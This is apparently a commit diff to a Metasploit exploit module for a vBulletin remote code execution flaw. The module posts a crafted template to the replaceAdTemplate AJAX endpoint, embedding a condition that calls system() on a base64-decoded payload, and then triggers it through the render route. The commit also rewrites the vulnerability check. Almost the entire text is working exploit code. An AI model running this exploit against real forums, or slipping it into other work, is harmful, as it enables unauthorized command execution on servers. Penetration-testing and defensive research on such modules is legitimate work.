Fix check, both requests can display if the system is vulnerable

Chocapikk · Chocapikk · commit 854d2354fa4c · 2025-05-26T20:04:19.000+02:00
diff --git a/modules/exploits/multi/http/vbulletin_replace_ad_template_rce.rb b/modules/exploits/multi/http/vbulletin_replace_ad_template_rce.rb
@@ -70,57 +70,50 @@ def initialize(info = {})
   end
 
   def check
-    body, marker = inject_and_trigger(:check)
-    return CheckCode::Unknown unless body
-    return CheckCode::Vulnerable if body.include?(marker)
-
-    CheckCode::Safe
+    inject_and_trigger(:check) ? CheckCode::Appears : CheckCode::Safe
   end
 
   def exploit
     inject_and_trigger(:exploit, payload: payload.encoded)
   end
 
   def inject_and_trigger(mode, payload: nil)
-    location = Rex::Text.rand_text_alpha(3, 8)
-    parameter = Rex::Text.rand_text_alpha(3, 8)
+    marker, location, param = Array.new(3) { Rex::Text.rand_text_alpha(5, 8) }
+    pattern = /string\(#{marker.length}\) "#{marker}"/
 
     if mode == :check
-      marker = Rex::Text.rand_text_alpha(5, 8)
       condition = %{"var_dump"("#{marker}")}
       trigger_value = Rex::Text.encode_base64(marker)
     else
-      # Sadly we can't use `eval()` here as it's a language construct and we need a proper function.
-      condition = %{"system"("base64_decode"(\$_POST["#{parameter}"]))}
-      trigger_value = Rex::Text.encode_base64(payload)
+      encoded_payload = Rex::Text.encode_base64(payload)
+      condition = %{"system"("base64_decode"("#{encoded_payload}"))}
     end
 
     template = "<vb:if condition='#{condition}'></vb:if>"
 
-    inject = send_request_cgi(
+    inj = send_request_cgi!(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path),
       'vars_post' => {
         'routestring' => 'ajax/api/ad/replaceAdTemplate',
-        'styleid' => '1', # Can't randomize this value
+        'styleid' => '1',
         'location' => location,
         'template' => template
       }
     )
-    return nil unless inject&.code == 200
+    return nil unless inj&.code == 200
+    return true if mode == :check && inj.body.match?(pattern)
+
+    render_vars = { 'routestring' => "ajax/render/ad_#{location}" }
+    render_vars[param] = trigger_value if mode == :check
 
-    trigger = send_request_cgi(
+    render = send_request_cgi!(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path),
-      'vars_post' => {
-        'routestring' => "ajax/render/ad_#{location}",
-        parameter => trigger_value
-      }
+      'vars_post' => render_vars
     )
-    return nil unless trigger&.code == 200
-
-    return [trigger.body, marker] if mode == :check
+    return nil unless render&.code == 200
 
-    trigger.body
+    mode == :check ? render.body.match?(pattern) : true
   end
 end
